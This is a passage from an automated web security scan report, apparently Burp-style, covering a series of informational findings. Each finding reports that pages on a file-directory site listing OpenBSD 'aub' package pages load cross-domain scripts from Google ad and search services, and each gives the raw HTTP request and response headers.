http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.4/sparc64/aub-2.0.5.tgz.32472.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:26 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "HN2mrHKKSLPiqeLdDv7xng"
Content-Length: 22236
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.83. http://dir.filewatcher.com/d/OpenBSD/3.7.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/3.7.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.7.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:05 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ldW7RoPSMM32AzKOlfWm+Q"
Content-Length: 5526
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 188
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/3.7/</title>
</head>
<b
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.84. http://dir.filewatcher.com/d/OpenBSD/3.7/powerpc.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/3.7/powerpc.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.7/powerpc.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:03 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "B6QYo4Llf6naoT3+82bBXw"
Content-Length: 15072
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 189
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/3.7/powerpc/</title>
</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.85. http://dir.filewatcher.com/d/OpenBSD/3.7/powerpc/aub-2.0.5.tgz.32553.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/3.7/powerpc/aub-2.0.5.tgz.32553.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.7/powerpc/aub-2.0.5.tgz.32553.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:02 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "QSjIlz4mHeQV6tMXgQ6s4Q"
Content-Length: 19360
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 186
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.86. http://dir.filewatcher.com/d/OpenBSD/3.9.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/3.9.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.9.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:01 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "SmKJOP6YWZiQzZkYVkcEZA"
Content-Length: 5427
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 187
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/3.9/</title>
</head>
<b
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.87. http://dir.filewatcher.com/d/OpenBSD/3.9/sparc.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/3.9/sparc.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.9/sparc.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:01 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "5ZcKE6J1sYIm0tnEAXPF0w"
Content-Length: 13057
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 185
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/3.9/sparc/</title>
</he
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.88. http://dir.filewatcher.com/d/OpenBSD/3.9/sparc/aub-2.0.5.tgz.32478.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/3.9/sparc/aub-2.0.5.tgz.32478.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.9/sparc/aub-2.0.5.tgz.32478.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:00 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "rXctGE9ZuJqH+Fb906+BLQ"
Content-Length: 19463
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 174
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.89. http://dir.filewatcher.com/d/OpenBSD/4.0.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.0.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.0.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:54 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "QHA8A2E3P01GvGdLle7K0A"
Content-Length: 5427
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:54 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 175
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.0/</title>
</head>
<b
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.90. http://dir.filewatcher.com/d/OpenBSD/4.0/alpha.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.0/alpha.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.0/alpha.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:46 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ntrpI/Vk2B6ApUr+/wYMJg"
Content-Length: 12981
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 175
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.0/alpha/</title>
</he
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.91. http://dir.filewatcher.com/d/OpenBSD/4.0/alpha/aub-2.0.5.tgz.32474.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.0/alpha/aub-2.0.5.tgz.32474.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.0/alpha/aub-2.0.5.tgz.32474.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:45 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "AyywHHTsGb4e3P/0PscWpw"
Content-Length: 22484
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:45 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 175
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.92. http://dir.filewatcher.com/d/OpenBSD/4.0/amd64.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.0/amd64.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.0/amd64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:48 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "gYhGvw8yDsOFELUImoJsgg"
Content-Length: 12992
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 173
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.0/amd64/</title>
</he
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.93. http://dir.filewatcher.com/d/OpenBSD/4.0/amd64/aub-2.0.5.tgz.32470.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.0/amd64/aub-2.0.5.tgz.32470.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.0/amd64/aub-2.0.5.tgz.32470.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:47 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "+T32qb0lEneT8hwdZwNmWQ"
Content-Length: 23043
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:47 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 174
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.94. http://dir.filewatcher.com/d/OpenBSD/4.0/m68k.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.0/m68k.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.0/m68k.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:53 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "BtrGPS615RcgSd2zfxnuNg"
Content-Length: 12886
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:53 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 176
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.0/m68k/</title>
</hea
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.95. http://dir.filewatcher.com/d/OpenBSD/4.0/m68k/aub-2.0.5.tgz.32479.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.0/m68k/aub-2.0.5.tgz.32479.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.0/m68k/aub-2.0.5.tgz.32479.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:51 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "sRJNXt2YnEvJFMxJ8cr0wA"
Content-Length: 22283
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 176
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.96. http://dir.filewatcher.com/d/OpenBSD/4.0/sparc.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.0/sparc.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.0/sparc.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:51 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "RwmybENk8AYckfLAmCSvYQ"
Content-Length: 12940
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 175
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.0/sparc/</title>
</he
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.97. http://dir.filewatcher.com/d/OpenBSD/4.0/sparc/aub-2.0.5.tgz.32477.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.0/sparc/aub-2.0.5.tgz.32477.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.0/sparc/aub-2.0.5.tgz.32477.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:50 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "8uwFEp9EFUfqNRxJeVtUQQ"
Content-Length: 22490
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 176
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.98. http://dir.filewatcher.com/d/OpenBSD/4.1.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.1.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.1.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:25 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "tTMqSJFldywaUyEtPM5P7Q"
Content-Length: 5522
Cache-Control: max-age=604800
